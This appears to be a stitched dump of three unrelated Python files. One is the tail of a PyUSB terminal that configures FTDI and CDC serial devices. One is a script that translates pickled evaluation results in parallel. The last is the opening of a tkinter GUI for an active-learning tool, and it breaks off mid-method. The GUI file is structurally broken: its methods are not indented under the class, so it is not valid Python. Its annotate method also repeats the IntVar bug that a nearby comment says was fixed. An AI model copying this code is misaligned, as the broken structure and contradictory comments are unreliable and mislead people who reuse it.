        req_type = (txdir << 7) + (req_type << 5) + recipient
        wlen = self.device.ctrl_transfer(
            bmRequestType=req_type,
            bRequest=1 if self._isFTDI else CDC_CMDS["SET_CONTROL_LINE_STATE"],
            wValue=ctrlstate,
            wIndex=1 if self._isFTDI else 0,
            data_or_wLength=0)
        # Fix: previously logged "Linecoding set" (copied from setLineCoding).
        log.debug("Control line state set, {}b sent".format(wlen))

    def setLineCoding(self, baudrate=None, parity=None,
                      databits=None, stopbits=None):
        """Set any subset of the line parameters.

        Unspecified parameters keep their cached values. Raises
        ValueError for out-of-range arguments.
        """
        sbits = {1: 0, 1.5: 1, 2: 2}  # stop bits -> CDC wire encoding
        dbits = {5, 6, 7, 8, 16}
        pmodes = {0, 1, 2, 3, 4}      # none / odd / even / mark / space
        brates = {300, 600, 1200, 2400, 4800, 9600, 14400,
                  19200, 28800, 38400, 57600, 115200, 230400}
        if stopbits is not None:
            if stopbits not in sbits.keys():
                valid = ", ".join(str(k) for k in sorted(sbits.keys()))
                raise ValueError("Valid stopbits are " + valid)
            self.stopbits = stopbits
        if databits is not None:
            if databits not in dbits:
                valid = ", ".join(str(d) for d in sorted(dbits))
                raise ValueError("Valid databits are " + valid)
            self.databits = databits
        if parity is not None:
            if parity not in pmodes:
                valid = ", ".join(str(pm) for pm in sorted(pmodes))
                raise ValueError("Valid parity modes are " + valid)
            self.parity = parity
        if baudrate is not None:
            # Fix: brates is a set, so the original brates.keys() calls
            # raised AttributeError whenever a baudrate was supplied.
            if baudrate not in brates:
                brs = sorted(brates)
                dif = [abs(br - baudrate) for br in brs]
                best = brs[dif.index(min(dif))]
                raise ValueError(
                    "Invalid baudrates, nearest valid is {}".format(best))
            self.baudrate = baudrate
        if self._isFTDI:
            self._setBaudFTDI(self.baudrate)
            self._setLineCodeFTDI(
                bits=self.databits,
                stopbits=sbits[self.stopbits],
                parity=self.parity,
                breaktype=0)
        else:
            # CDC line coding blob: dwDTERate (LE32), bCharFormat,
            # bParityType, bDataBits -- see the header comment of this file.
            linecode = [
                self.baudrate & 0xff,
                (self.baudrate >> 8) & 0xff,
                (self.baudrate >> 16) & 0xff,
                (self.baudrate >> 24) & 0xff,
                sbits[self.stopbits],
                self.parity,
                self.databits]
            txdir = 0  # 0:OUT, 1:IN
            req_type = 1  # 0:std, 1:class, 2:vendor
            recipient = 1  # 0:device, 1:interface, 2:endpoint, 3:other
            req_type = (txdir << 7) + (req_type << 5) + recipient
            wlen = self.device.ctrl_transfer(
                req_type, CDC_CMDS["SET_LINE_CODING"],
                data_or_wLength=linecode)
            log.debug("Linecoding set, {}b sent".format(wlen))

    def _setBaudFTDI(self, baudrate):
        """Program an FTDI device's baud divisor (vendor request 3)."""
        if not self._isFTDI:
            return
        actual_baud, value, ndex = ftdi_to_clkbits(baudrate)
        log.debug("Actual baud: {}, Value 0x{:X}, Index {}".format(
            actual_baud, value, ndex))
        txdir = 0  # 0:OUT, 1:IN
        req_type = 2  # 0:std, 1:class, 2:vendor
        recipient = 0  # 0:device, 1:interface, 2:endpoint, 3:other
        req_type = (txdir << 7) + (req_type << 5) + recipient
        self.device.ctrl_transfer(
            bmRequestType=req_type,
            bRequest=3,
            wValue=value,
            wIndex=ndex,
            data_or_wLength=0)
        log.debug("FTDI Baudrate set to {}".format(actual_baud))

    def _setLineCodeFTDI(self, bits, stopbits, parity, breaktype=0):
        """Program FTDI data bits / parity / stop bits (vendor request 4)."""
        if not self._isFTDI:
            return
        # Pack the fields into wValue per the FTDI protocol layout.
        value = bits
        value += parity << 8
        value += stopbits << 11
        value += breaktype << 14
        txdir = 0  # 0:OUT, 1:IN
        req_type = 2  # 0:std, 1:class, 2:vendor
        recipient = 0  # 0:device, 1:interface, 2:endpoint, 3:other
        req_type = (txdir << 7) + (req_type << 5) + recipient
        wlen = self.device.ctrl_transfer(
            bmRequestType=req_type,
            bRequest=4,  # line coding
            wValue=value,
            wIndex=1,
            data_or_wLength=0)
        return wlen

    def _resetFTDI(self):
        """ reset the FTDI device
        """
        if not self._isFTDI:
            return
        txdir = 0  # 0:OUT, 1:IN
        req_type = 2  # 0:std, 1:class, 2:vendor
        recipient = 0  # 0:device, 1:interface, 2:endpoint, 3:other
        req_type = (txdir << 7) + (req_type << 5) + recipient
        self.device.ctrl_transfer(
            bmRequestType=req_type,
            bRequest=0,  # RESET
            wValue=0,  # RESET
            wIndex=1,
            data_or_wLength=0)

    def _flushFTDI(self, rx=True, tx=True):
        """ flush rx / tx buffers for ftdi device
        """
        if not self._isFTDI:
            return
        txdir = 0  # 0:OUT, 1:IN
        req_type = 2 if self._isFTDI else 1  # 0:std, 1:class, 2:vendor
        # 0:device, 1:interface, 2:endpoint, 3:other
        recipient = 0 if self._isFTDI else 1
        req_type = (txdir << 7) + (req_type << 5) + recipient
        if rx:
            self.device.ctrl_transfer(
                bmRequestType=req_type,
                bRequest=0,  # RESET
                wValue=1,  # PURGE RX
                wIndex=1,  # INTERFACE 1
                data_or_wLength=0)
        if tx:
            self.device.ctrl_transfer(
                bmRequestType=req_type,
                bRequest=0,  # RESET
                wValue=2,  # PURGE TX
                wIndex=1,  # INTERFACE 1
                data_or_wLength=0)

    def getLineCoding(self):
        """Query the device's line coding (CDC GET_LINE_CODING), cache the
        values on self, and print them.

        FTDI devices do not support this request; a warning is logged but
        the request is still attempted (original behaviour preserved).
        """
        if self._isFTDI:
            log.warning("FTDI does not support reading baud parameters")
        txdir = 1  # 0:OUT, 1:IN
        req_type = 1  # 0:std, 1:class, 2:vendor
        recipient = 1  # 0:device, 1:interface, 2:endpoint, 3:other
        req_type = (txdir << 7) + (req_type << 5) + recipient
        buf = self.device.ctrl_transfer(bmRequestType=req_type,
                                        bRequest=CDC_CMDS["GET_LINE_CODING"],
                                        wValue=0,
                                        wIndex=0,
                                        data_or_wLength=255,
                                        )
        # Decode the 7-byte line coding blob (LE32 rate, stop, parity, data).
        self.baudrate = buf[0] + (buf[1] << 8) + \
            (buf[2] << 16) + (buf[3] << 24)
        self.stopbits = 1 + (buf[4] / 2.0)
        self.parity = buf[5]
        self.databits = buf[6]
        print("LINE CODING:")
        print(" {0} baud, parity mode {1}".format(self.baudrate, self.parity))
        print(
            " {0} data bits, {1} stop bits".format(
                self.databits,
                self.stopbits))

    def disconnect(self):
        """Stop the rx thread, release the device, and try to re-attach
        the kernel driver (up to 10 attempts, 0.1 s apart)."""
        self._endRx()
        # Fix: replaced a busy spin on the removed isAlive() API with join().
        if self._rxthread is not None:
            self._rxthread.join()
        usb.util.dispose_resources(self.device)
        if self._rxthread is None:
            log.debug("Rx thread never existed")
        else:
            log.debug("Rx thread is {}".format(
                "alive" if self._rxthread.is_alive() else "dead"))
        attempt = 1
        while attempt < 10:
            try:
                self.device.attach_kernel_driver(0)
                log.debug(
                    "Attach kernal driver on attempt {0}".format(attempt))
                break
            except usb.USBError:
                attempt += 1
                time.sleep(0.1)  # sleep seconds
        if attempt == 10:
            log.error("Could not attach kernal driver")
def configLog():
    """Create and return the module logger.

    Always logs at DEBUG level; a file handler writing terminal.log is
    attached only when PYTERMINAL_DEBUG is set in the environment.
    """
    logger = logging.getLogger("vcp_terminal")
    logger.setLevel(logging.DEBUG)
    if "PYTERMINAL_DEBUG" in os.environ:
        file_handler = logging.FileHandler("terminal.log")
        fmt = logging.Formatter(
            "%(levelname)s %(name)s %(threadName)-10s " +
            "%(funcName)s() %(message)s")
        file_handler.setFormatter(fmt)
        logger.addHandler(file_handler)
    return logger
def selectDevice():
    """Interactively choose a USB device.

    Lists devices whose class could host a serial function (composite
    0x00, CDC 0x02, vendor-specific 0xFF) and prompts until the user
    enters a valid index. Returns the pyusb Device, or None when no
    candidate devices are connected.
    """
    devices = [d for d in usb.find(find_all=True)
               if d.bDeviceClass in {0, 2, 0xff}]
    if not devices:
        print("No devices detected")
        return None
    selection = -1
    selected = False
    print("PyUSB VCP Terminal: use ctrl+c or ctrl+d to exit")
    while not selected:
        for i, d in enumerate(devices):
            # String descriptors may be unreadable (permissions, stalled
            # device); fall back to placeholders instead of aborting.
            # Fix: the bare except clauses also swallowed KeyboardInterrupt,
            # contradicting the "ctrl+c to exit" promise above.
            try:
                manufacturer = d.manufacturer + " "
            except Exception:
                manufacturer = "Unknown"
            try:
                prod = d.product + " "
            except Exception:
                prod = ""
            try:
                serial = d.serial_number + " "
            except Exception:
                serial = ""
            print(
                "%d: %04x:%04x on Bus %03d %03d %s%s%s" %
                (i,
                 d.idVendor,
                 d.idProduct,
                 d.bus,
                 d.address,
                 manufacturer,
                 prod,
                 serial))
        selection = input("Enter device: ")
        try:
            selection = int(selection)
            if selection < 0 or selection >= len(devices):
                raise ValueError(selection)  # out of range, re-prompt below
            selected = True
        except Exception:
            print(
                "Please enter number between 0 and {}".format(
                    len(devices) - 1))
    d = devices[selection]
    return d
def configInputQueue():
    """Spawn a daemon thread that feeds keystrokes into a queue.

    Returns (queue, thread). The thread reads via the module-level
    ``getch`` and exits after forwarding ctrl+c or ctrl+d.
    """
    def captureInput(iqueue):
        while True:
            key = getch()
            if key in ('\x03', '\x04'):  # end on ctrl+c / ctrl+d
                log.debug("Break received (\\x{0:02X})".format(ord(key)))
                iqueue.put(key)
                break
            log.debug(
                "Input Char '{}' received".format(
                    key if key != '\r' else '\\r'))
            iqueue.put(key)

    input_queue = queue.Queue()
    input_thread = threading.Thread(target=captureInput, args=(input_queue,))
    input_thread.daemon = True
    input_thread.start()
    return input_queue, input_thread
def fmt_text(text):
    """Render a sequence of byte values as display text.

    Printable ASCII plus CR/LF pass through; everything else becomes a
    ``\\xNN`` escape. Line endings are normalised to CRLF.
    """
    printable = set(range(ord(' '), ord('~') + 1))
    printable.add(ord('\r'))
    printable.add(ord('\n'))
    pieces = []
    for code in text:
        if code in printable:
            pieces.append(chr(code))
        else:
            pieces.append("\\x{:02X}".format(code))
    lines = "".join(pieces).split('\n')
    return "\r\n".join(line.strip('\r') for line in lines)
def runTerminal(d):
    """Run the interactive terminal loop against pyusb device *d*.

    Echoes received bytes to stdout and forwards keystrokes to the
    device until ctrl+c / ctrl+d is pressed.
    """
    log.info("Beginning a terminal run")
    p = ComPort(d)
    p.setControlLineState(True, True)
    p.setLineCoding()
    q, t = configInputQueue()
    while True:
        if p.rxlen:
            print(fmt_text(p.readBytes()), end="")
        if not q.empty():
            c = q.get()
            if c == '\x03' or c == '\x04':  # end on ctrl+c / ctrl+d
                print()
                p.disconnect()
                break
            try:
                p.write(c)
            except usb.USBError as e:
                # Fix: Logger.warn is a deprecated alias of warning.
                log.warning("USB Error on write {}".format(e))
                return
        else:
            # Fix: the original polled with no sleep, pegging a CPU core;
            # 5 ms matches the rx thread's own poll interval.
            time.sleep(0.005)
def ftdi_to_clkbits(baudrate):  # from libftdi
    """Encode *baudrate* into FTDI divisor fields.

    Returns (actual_baud, wValue, wIndex) for the vendor SET_BAUDRATE
    request. Reference encodings (wValue bytes => divisor, rate):

    10,27 => divisor = 10000,  rate = 300
    88,13 => divisor = 5000,   rate = 600
    C4,09 => divisor = 2500,   rate = 1200
    E2,04 => divisor = 1250,   rate = 2,400
    71,02 => divisor = 625,    rate = 4,800
    38,41 => divisor = 312.5,  rate = 9,600
    D0,80 => divisor = 208.25, rate = 14406
    9C,80 => divisor = 156,    rate = 19,230
    4E,C0 => divisor = 78,     rate = 38,461
    34,00 => divisor = 52,     rate = 57,692
    1A,00 => divisor = 26,     rate = 115,384
    0D,00 => divisor = 13,     rate = 230,769
    """
    clk = 48000000
    clk_div = 16
    # Maps the 3 fractional divisor bits to the FTDI sub-divisor code.
    frac_code = [0, 3, 2, 4, 1, 5, 6, 7]
    if baudrate >= clk / clk_div:
        # At or above 3 MBaud: special encoding 0.
        encoded = 0
        actual = clk // clk_div
    elif baudrate >= clk / (clk_div + clk_div / 2):
        # 2 MBaud: special encoding 1.
        encoded = 1
        actual = clk // (clk_div + clk_div // 2)
    elif baudrate >= clk / (2 * clk_div):
        # 1.5 MBaud: special encoding 2.
        encoded = 2
        actual = clk // (2 * clk_div)
    else:
        # Divide by 16 to keep 3 fractional bits plus one rounding bit.
        raw = clk * 16 // clk_div // baudrate
        rounded = (raw + 1) // 2
        if rounded > 0x20000:  # clamp to the largest representable divisor
            rounded = 0x1ffff
        actual = clk * 16 // clk_div // rounded
        actual = (actual + 1) // 2
        encoded = (rounded >> 3) + (frac_code[rounded & 0x7] << 14)
    return actual, encoded & 0xFFFF, encoded >> 16
if __name__ == '__main__':
    # Entry point: configure logging and keyboard input, pick a device,
    # then either drop into debug mode (-d) or run the terminal loop.
    log = configLog()
    getch = _Getch()  # init an instance
    d = selectDevice()
    if d is None:
        exit()
    if sys.argv[-1] == '-d':
        # Debug mode leaves the rx thread stopped for interactive poking.
        """ use ...pyusb$ ipython3 -i toots/terminal.py -- -d """
        p = ComPort(d, start=False)
        print("Debug mode: p is ComPort, d is pyusb Device")
    else:
        runTerminal(d)
def show_fti_baud():
    """Print a table comparing standard baud rates with the actual rates
    the FTDI divisor encoding can produce, plus the request fields."""
    standard_rates = [300, 600, 1200, 2400, 4800, 9600, 14400,
                      19200, 28800, 38400, 57600, 115200, 230400]
    for requested in standard_rates:
        actual, value, index = ftdi_to_clkbits(requested)
        error = (requested - actual) * 1.0 / requested
        print("{:7} | {:7} | {:5.1%} | wVal {:4X}h | wIndex {:4X}h".format(
            requested, actual, error, value, index))
|
translate.py | import argparse
import gzip
import os
import pickle
import sys
import time
import traceback
from multiprocessing import Process
from typing import List
from Evaluator.CodeInspection.utils import mkdirRecursive
from Evaluator.EventTranslation import EventProcessor, DEFAULT_TRANSLATORS
from Evaluator.Ranking import MetaRanking
def translate_file(path: str, event_processor: EventProcessor, output_dir: str):
    """
    Translate a single result file with the given event processor.

    :param path: The result file's path
    :param event_processor: The EventProcessor instance to translate the result file with
    :param output_dir: The directory to put the translated results in
    """
    assert os.path.exists(path)
    try:
        # Load the gzipped, pickled raw results.
        with gzip.open(path) as fh:
            _results = pickle.load(fh)
        print(
            f"Translating results from {_results.project_name}, bug {_results.bug_id}"
        )
        mr = MetaRanking(*event_processor.process(_results), _results)
        output_file = f"{output_dir}/{_results.project_name}/translated_results_{_results.project_name}_{_results.bug_id}.pickle.gz"
        # Ensure the per-project output directory exists, then replace any
        # stale result file ('xb' mode requires the target to be absent).
        parent_dir = os.path.dirname(os.path.abspath(output_file))
        if not os.path.exists(parent_dir):
            mkdirRecursive(parent_dir)
        if os.path.exists(output_file):
            os.remove(output_file)
        with gzip.open(output_file, "xb") as fh:
            pickle.dump(mr, fh)
        print("Succeeded " + path)
    except Exception as err:
        # Best-effort: report and continue with the next file.
        print(type(err))
        traceback.print_tb(err.__traceback__)
        print("Failed " + path)
def translate_directory(path: str, event_processor: EventProcessor, output_dir: str):
    """
    Translate every result file in the given directory

    :param path: The directory whose files are translated (non-recursive)
    :param event_processor: The EventProcessor instance to translate the result file with
    :param output_dir: The directory to put the translated results in
    """
    assert os.path.isdir(path)
    for filename in sorted(os.listdir(path)):
        # Fix: the loop variable was never used -- every iteration tested
        # the same hard-coded path. Skip subdirectories, translate files.
        if os.path.isdir(f"{str(path)}/{filename}"):
            continue
        translate_file(f"{str(path)}/{filename}", event_processor, output_dir)
def get_subdirs_recursive(start_path: str) -> List[str]:
    """
    Recursively search the given directory for subdirectories
    :param start_path: The root directory of the search
    :return: A list of subdirectories (real paths, depth-first order)
    """
    found = []
    for entry in os.listdir(start_path):
        candidate = f"{start_path}/{entry}"
        if os.path.isdir(candidate):
            real = os.path.realpath(candidate)
            found.append(real)
            found.extend(get_subdirs_recursive(real))
    return found
def translate_directory_parallel(
    path: str, event_processor: EventProcessor, output_dir: str, threads: int = -1
):
    """
    Translate every result file recursively found in the given directory

    :param path: The directory to recursively search for result files
    :param event_processor: The EventProcessor instance to translate the result file with
    :param output_dir: The directory to put the translated results in
    :param threads: The number of parallel threads to create. Default is the number of available cores

    Note: despite the parameter name, one *process* (multiprocessing.Process)
    is spawned per directory; `threads` only caps how many run at once.
    """
    if threads < 1:
        threads = os.cpu_count()
    # One worker per subdirectory, plus the root directory itself.
    dirs = get_subdirs_recursive(path) + [path]
    processes = [
        Process(
            target=translate_directory, args=(d, event_processor, output_dir), name=d
        )
        for d in dirs
    ]
    active_processes = []
    # Scheduling loop: top up to `threads` live workers, reap finished
    # ones, and re-check every 100 ms until no pending workers remain.
    while len(processes) > 0:
        while len(active_processes) < threads and len(processes) > 0:
            p = processes.pop()
            p.start()
            active_processes.append(p)
        for p in active_processes.copy():
            if not p.is_alive():
                active_processes.remove(p)
        time.sleep(0.1)
    # NOTE(review): returns as soon as the pending list empties, without
    # joining the still-running workers -- confirm callers don't rely on
    # all translations being finished when this function returns.
if __name__ == "__main__":
    # CLI entry point: translate recorded event files into framework events.
    DEFAULT_OUTPUT = ""
    arg_parser = argparse.ArgumentParser(
        description="Translate raw, recorded events to Evaluation Framework events."
    )
    arg_parser.add_argument(
        "-d",
        "--directory",
        required=True,
        type=str,
        default="",
        # Fix: -d takes a directory, but the help text said "file".
        help="The directory containing the recorded events",
    )
    arg_parser.add_argument(
        "-r", "--recursive", help="Search for files recursively", action="store_true"
    )
    arg_parser.add_argument(
        "-o",
        "--output_dir",
        required=False,
        type=str,
        default=DEFAULT_OUTPUT,
        # Fix: typo "diretory".
        help="The output directory",
    )
    args = arg_parser.parse_args()
    event_processor = EventProcessor(DEFAULT_TRANSLATORS)
    output_dir = args.output_dir
    if output_dir == "":
        # Default: a results_translated folder next to this script.
        output_dir = (
            os.path.dirname(os.path.abspath(sys.argv[0])) + "/results_translated"
        )
    if args.recursive:
        translate_directory_parallel(args.directory, event_processor, output_dir)
    else:
        translate_directory(args.directory, event_processor, output_dir)
|
main_panel.py | from idlelib.tooltip import Hovertip
import numpy
import support
import tkinter as tk
import PIL.Image
from threading import Thread
from tkinter.constants import END
from tkinter import *
from tkinter import messagebox
from tkinter.filedialog import askdirectory
from PIL import ImageTk
from UI import ui_constants
from technique_type import TechniqueType
from model import start_exploiting_gradient
from support import parse_bool
class MainPanel:
def __init__(self, master):
    """Build the main window: dataset/technique controls, the run
    button, and the output log area.

    master -- the Tk root window
    """
    support._print_delegate = self  # route support's printing into this panel
    self.printing_progress = False
    # base data
    self.techniques = ((ui_constants.text_ssd_technique, 0), (ui_constants.text_sod_technique, 1), (ui_constants.text_csd_technique, 2), (ui_constants.text_cod_technique, 3))
    self.technique = TechniqueType.SCORE_SINGLE_DISTANCE
    # Fix: IntVar's first positional argument is `master`, not the value;
    # IntVar(0) passed 0 as the master widget. Pass the value by keyword.
    self.technique_selection = IntVar(value=0)
    self.base_folder = None
    self.reproducibility = False
    self.use_features = False
    self.resume = False
    # setting UI
    self.root = master
    # setting title
    self.root.title(ui_constants.text_tool_name)
    # setting window size (fixed, centred on screen)
    width = 900
    height = 570
    screenwidth = self.root.winfo_screenwidth()
    screenheight = self.root.winfo_screenheight()
    align_string = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
    self.root.geometry(align_string)
    self.root.resizable(width=False, height=False)
    # dataset folder chooser
    button_select_dataset_folder = tk.Button(self.root)
    button_select_dataset_folder["bg"] = ui_constants.color_bg_button
    button_select_dataset_folder["fg"] = ui_constants.color_fg_button
    button_select_dataset_folder["text"] = ui_constants.text_select_dataset_folder
    button_select_dataset_folder.place(x=340, y=10, width=193, height=30)
    button_select_dataset_folder["command"] = self.select_dataset_folder
    # left column: numeric entries and flags
    label_quantity_samples_to_select = tk.Label(self.root)
    label_quantity_samples_to_select["justify"] = "left"
    label_quantity_samples_to_select["text"] = ui_constants.text_quantity_samples_to_select + ":"
    label_quantity_samples_to_select.place(x=10, y=80, width=200, height=30)
    Hovertip(label_quantity_samples_to_select, ui_constants.text_description_quantity_samples_to_select)
    self.entry_quantity_samples_to_select = tk.Entry(self.root)
    self.entry_quantity_samples_to_select.insert(0, "500")
    self.entry_quantity_samples_to_select.place(x=220, y=80, width=70, height=30)
    label_limit_samples = tk.Label(self.root)
    label_limit_samples["justify"] = "left"
    label_limit_samples["text"] = ui_constants.text_limit_samples + ":"
    # Fix: a stray duplicate place() call first put this label at y=160,
    # overlapping the 'resume' row; only the y=120 placement is kept.
    label_limit_samples.place(x=10, y=120, width=200, height=30)
    Hovertip(label_limit_samples, ui_constants.text_description_limit_samples)
    self.entry_limit_samples = tk.Entry(self.root)
    self.entry_limit_samples.insert(0, "-1")
    self.entry_limit_samples.place(x=220, y=120, width=70, height=30)
    label_resume = tk.Label(self.root)
    label_resume["justify"] = "left"
    label_resume["text"] = ui_constants.text_resume + ":"
    label_resume.place(x=10, y=160, width=200, height=30)
    Hovertip(label_resume, ui_constants.text_description_resume)
    check_resume = tk.Checkbutton(self.root)
    check_resume["offvalue"] = "0"
    check_resume["onvalue"] = "1"
    check_resume["command"] = self.set_resume
    check_resume.place(x=220, y=160, width=70, height=30)
    label_reproducibility = tk.Label(self.root)
    label_reproducibility["justify"] = "left"
    label_reproducibility["text"] = ui_constants.text_reproducibility + ":"
    label_reproducibility.place(x=10, y=200, width=200, height=30)
    Hovertip(label_reproducibility, ui_constants.text_description_reproducibility)
    check_reproducibility = tk.Checkbutton(self.root)
    check_reproducibility["offvalue"] = "0"
    check_reproducibility["onvalue"] = "1"
    check_reproducibility["command"] = self.set_reproducibility
    check_reproducibility.place(x=220, y=200, width=70, height=30)
    label_use_features = tk.Label(self.root)
    label_use_features["justify"] = "left"
    label_use_features["text"] = ui_constants.text_use_features + ":"
    label_use_features.place(x=10, y=240, width=200, height=30)
    Hovertip(label_use_features, ui_constants.text_description_use_features)
    check_use_features = tk.Checkbutton(self.root)
    check_use_features["offvalue"] = "0"
    check_use_features["onvalue"] = "1"
    check_use_features["command"] = self.set_use_features
    check_use_features.place(x=220, y=240, width=70, height=30)
    # right column: epoch entries and technique radio group
    label_training_epochs = tk.Label(self.root)
    label_training_epochs["justify"] = "left"
    label_training_epochs["text"] = ui_constants.text_training_epochs + ":"
    label_training_epochs.place(x=520, y=80, width=200, height=30)
    Hovertip(label_training_epochs, ui_constants.text_description_training_epochs)
    self.entry_training_epochs = tk.Entry(self.root)
    self.entry_training_epochs.insert(0, "10")
    self.entry_training_epochs.place(x=730, y=80, width=70, height=30)
    label_active_epochs = tk.Label(self.root)
    label_active_epochs["justify"] = "left"
    label_active_epochs["text"] = ui_constants.text_active_epochs + ":"
    label_active_epochs.place(x=520, y=120, width=200, height=30)
    Hovertip(label_active_epochs, ui_constants.text_description_active_epochs)
    self.entry_active_epochs = tk.Entry(self.root)
    self.entry_active_epochs.insert(0, "10")
    self.entry_active_epochs.place(x=730, y=120, width=70, height=30)
    label_technique = tk.Label(self.root)
    label_technique["justify"] = "left"
    label_technique["text"] = ui_constants.text_technique + ":"
    label_technique.place(x=520, y=160, width=200, height=30)
    Hovertip(label_technique, ui_constants.text_description_technique)
    # radio buttons all share self.technique_selection; values match the
    # mapping handled in select_technique
    radio_ssd = tk.Radiobutton(self.root)
    radio_ssd["value"] = 0
    radio_ssd["variable"] = self.technique_selection
    radio_ssd["justify"] = "left"
    radio_ssd["text"] = ui_constants.text_ssd_technique
    radio_ssd["command"] = self.select_technique
    radio_ssd.place(x=740, y=160, width=50, height=30)
    Hovertip(radio_ssd, ui_constants.text_description_ssd)
    radio_sod = tk.Radiobutton(self.root)
    radio_sod["value"] = 1
    radio_sod["variable"] = self.technique_selection
    radio_sod["justify"] = "left"
    radio_sod["text"] = ui_constants.text_sod_technique
    radio_sod["command"] = self.select_technique
    radio_sod.place(x=740, y=180, width=50, height=30)
    Hovertip(radio_sod, ui_constants.text_description_sod)
    radio_csd = tk.Radiobutton(self.root)
    radio_csd["value"] = 2
    radio_csd["variable"] = self.technique_selection
    radio_csd["justify"] = "left"
    radio_csd["text"] = ui_constants.text_csd_technique
    radio_csd["command"] = self.select_technique
    radio_csd.place(x=740, y=200, width=50, height=30)
    Hovertip(radio_csd, ui_constants.text_description_csd)
    radio_cod = tk.Radiobutton(self.root)
    radio_cod["value"] = 3
    radio_cod["variable"] = self.technique_selection
    radio_cod["justify"] = "left"
    radio_cod["text"] = ui_constants.text_cod_technique
    radio_cod["command"] = self.select_technique
    radio_cod.place(x=740, y=220, width=50, height=30)
    Hovertip(radio_cod, ui_constants.text_description_cod)
    # run button and read-only output area
    self.button_play_active_learning = tk.Button(self.root)
    self.button_play_active_learning["bg"] = ui_constants.color_bg_button
    self.button_play_active_learning["fg"] = ui_constants.color_fg_button
    self.button_play_active_learning["text"] = ui_constants.text_play_active_learning
    self.button_play_active_learning["command"] = self.play_active_learning
    self.button_play_active_learning.place(x=350, y=320, width=180, height=30)
    self.output_area = tk.Text(self.root, state="disabled")
    self.output_area["fg"] = "#333333"
    self.output_area.place(x=50, y=370, width=800, height=200)
def select_dataset_folder(self):
    """Ask the user for the dataset folder (button callback)."""
    self.base_folder = askdirectory()
def set_reproducibility(self):
    """Toggle the reproducibility flag (checkbutton callback)."""
    self.reproducibility = not self.reproducibility
def set_use_features(self):
    """Toggle the use-features flag (checkbutton callback)."""
    self.use_features = not self.use_features
def set_resume(self):
    """Toggle the resume flag (checkbutton callback)."""
    self.resume = not self.resume
def select_technique(self):
    """Map the selected radio value onto self.technique (radio callback)."""
    technique_by_value = {
        0: TechniqueType.SCORE_SINGLE_DISTANCE,
        1: TechniqueType.SCORE_OTHER_DISTANCE,
        2: TechniqueType.CLASS_SINGLE_DISTANCE,
        3: TechniqueType.CLASS_OTHER_DISTANCE,
        4: TechniqueType.RANDOM,
        5: TechniqueType.LEAST_CONFIDENCE,
    }
    choice = self.technique_selection.get()
    if choice in technique_by_value:
        self.technique = technique_by_value[choice]
def play_active_learning(self):
    """Validate the form and launch the training run on a worker thread.

    On any malformed numeric field a dialog is shown and nothing starts.
    While the worker runs, the button is rebound to show_alert_working;
    completed_task restores it.
    """
    try:
        # Parse every form field up front; a bad number aborts below.
        base_folder = self.base_folder
        samples_to_select = int(self.entry_quantity_samples_to_select.get())
        limit_samples = int(self.entry_limit_samples.get())
        resume = parse_bool(self.resume)
        reproducibility = parse_bool(self.reproducibility)
        use_features = parse_bool(self.use_features)
        training_epochs = int(self.entry_training_epochs.get())
        active_epochs = int(self.entry_active_epochs.get())
        technique = self.technique
    except Exception:
        # Fix: was a bare except; Exception still covers ValueError from
        # int() and widget errors, but lets KeyboardInterrupt escape.
        messagebox.showinfo(title=ui_constants.text_oops, message=ui_constants.text_all_fields_numbers)
        return
    # Only base_folder can still be missing here: the int() conversions
    # above either succeeded (ints are never None/"") or raised, so the
    # original per-field None/"" checks were unreachable and are removed.
    if base_folder is None or base_folder == "":
        messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_dataset_folder))
        return
    # Prevent re-entry while the worker thread is running.
    self.button_play_active_learning["command"] = self.show_alert_working
    thread = Thread(target=start_exploiting_gradient, args=(samples_to_select, limit_samples, resume, reproducibility, use_features, training_epochs, active_epochs, technique, base_folder, self, self.completed_task))
    thread.start()
def completed_task(self, technique, elapsed_time, loss, accuracy):
    """Worker-thread completion callback.

    loss and accuracy are (after first training, after exploiting
    gradient) pairs. Prints a summary, re-enables the run button, and
    shows a completion dialog.
    """
    self.print_message("Completed, below the results:\nUsed technique: {}\nActive Learning training time: {}\nLoss after first training: {}\nLoss after exploiting gradient: {}\nAccuracy after first training: {}\nAccuracy after exploiting gradient: {}\n".format(technique, elapsed_time, loss[0], loss[1], accuracy[0], accuracy[1]))
    self.button_play_active_learning["command"] = self.play_active_learning
    # NOTE(review): uses text_oops as the title of a success dialog --
    # confirm this is intended rather than a success-specific title.
    messagebox.showinfo(title=ui_constants.text_oops, message=ui_constants.text_completed)
def annotate(self, sample_to_annotate):
    """Open a modal dialog showing the image at `sample_to_annotate` and block
    until the user picks a class and clicks the annotate button.

    Returns a one-hot numpy array: [0, 1] if the user chose "contains"
    (selection 0), [1, 0] otherwise.
    """
    # setting variables
    # NOTE(review): IntVar's first positional argument is `master`, not the
    # initial value — `IntVar(0)` passes 0 as master; confirm this is intended.
    clicked = IntVar(0)
    self.class_selection = IntVar(0)
    self.selection = 0
    # setting UI
    appended_root = tk.Toplevel(self.root)
    # setting title
    appended_root.title(ui_constants.text_annotate)
    # setting layout: fixed 700x700 window centered on the screen
    width = 700
    height = 700
    screenwidth = appended_root.winfo_screenwidth()
    screenheight = appended_root.winfo_screenheight()
    align_string = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
    appended_root.geometry(align_string)
    appended_root.resizable(width=False, height=False)
    # Load the sample image; keep a reference on the label so Tk does not
    # garbage-collect the PhotoImage while the dialog is up.
    top_image_render = ImageTk.PhotoImage(PIL.Image.open(sample_to_annotate))
    image_to_annotate=tk.Label(appended_root, image=top_image_render)
    image_to_annotate.image = top_image_render
    image_to_annotate.place(x=100, y=60, width=500, height=500)
    # Radio button: sample contains the target class (value 0)
    radio_contains = tk.Radiobutton(appended_root)
    radio_contains["value"] = 0
    radio_contains["variable"] = self.class_selection
    radio_contains["justify"] = "left"
    radio_contains["text"] = ui_constants.text_contains
    radio_contains["command"] = self.select_class
    radio_contains.place(x=250, y=600, width=100, height=30)
    # Radio button: sample does not contain the target class (value 1)
    radio_not_contains = tk.Radiobutton(appended_root)
    radio_not_contains["value"] = 1
    radio_not_contains["variable"] = self.class_selection
    radio_not_contains["justify"] = "left"
    radio_not_contains["text"] = ui_constants.text_not_contains
    radio_not_contains["command"] = self.select_class
    radio_not_contains.place(x=350, y=600, width=100, height=30)
    # Confirm button: setting `clicked` releases the wait_variable below.
    button_elaborate = tk.Button(appended_root)
    button_elaborate["bg"] = ui_constants.color_bg_button
